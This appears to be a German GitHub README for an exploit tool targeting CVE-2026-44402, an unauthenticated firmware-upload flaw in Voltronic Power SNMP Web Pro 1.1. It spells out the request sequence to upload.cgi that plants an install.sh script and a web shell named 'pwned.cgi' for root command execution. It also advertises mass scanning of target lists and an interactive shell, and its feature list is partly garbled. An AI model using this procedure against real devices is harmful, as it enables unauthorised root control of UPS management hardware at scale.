
Exploit für CVE-2026-44402, der Voltronic Power SNMP Web Pro 1.1 angreift und nicht authentifizierte Remote-Codeausführung über einen bösartigen Firmware-Upload ermöglicht. Unterstützt Einzelziel- und Massenscanning mit interaktiver Shell.
Kritische nicht authentifizierte Remote-Codeausführung (CVSS 9.8) — Voltronic Power SNMP Web Pro 1.1
Dieses Tool nutzt CVE-2026-44402 aus, eine Schwachstelle im Gerät Voltronic Power SNMP Web Pro 1.1, die es nicht authentifizierten Angreifern ermöglicht, ein bösartiges Firmware-Archiv hochzuladen und Systembefehle als root über den Endpunkt upload.cgi auszuführen.
| Eigenschaft | Wert |
|---|
| CVE-ID | CVE-2026-44402 |
| CVSS-Score | 9.8 (Kritisch) |
| CWE | CWE-434 — Unbeschränkter Upload von Dateien mit gefährlichem Typ |
| Betroffenes Produkt | Voltronic Power SNMP Web Pro 1.1 |
| Authentifizierung erforderlich | NEIN (nicht authentifiziert) |
| Angriffsvektor | Netzwerkbasiert (remote) |
| Berechtigung | Root-Level-RCE |
Die Schwachstelle existiert in der Firmware-Update-Funktionalität (upload.cgi). Der Endpunkt:
Bösartiges Archiv erstellen
upgrade/install.sh — Installationsskriptupgrade/pwned.cgi — Web-ShellArchiv hochladen → POST /cgi-bin/upload.cgi?name=upgrade&?params=upload
"ACK" bei ErfolgArchiv extrahieren → GET /cgi-bin/upload.cgi?name=upgrade&?params=extract
"ACK" bei ErfolgInstallieren → GET /cgi-bin/upload.cgi?name=upgrade&?params=install
install.sh wird als root ausgeführt"ACK" bei ErfolgWeb-Shell aktiv → POST /cgi-bin/pwned.cgi
cmd-Parameter ausführen → RCE! 🚀-u)-f targets.txt)-t 20) — schnelle parallele Verarbeitung--shell) mit cd-Unterstützungurl | output-Format--proxy)--timeout)-v) zum Debuggenrequests und prompt_toolkit# Repository klonen
git clone https://github.com/0xCyp1337/CVE-2026-44402.git
cd CVE-2026-44402
python3 CVE-2026-44402.py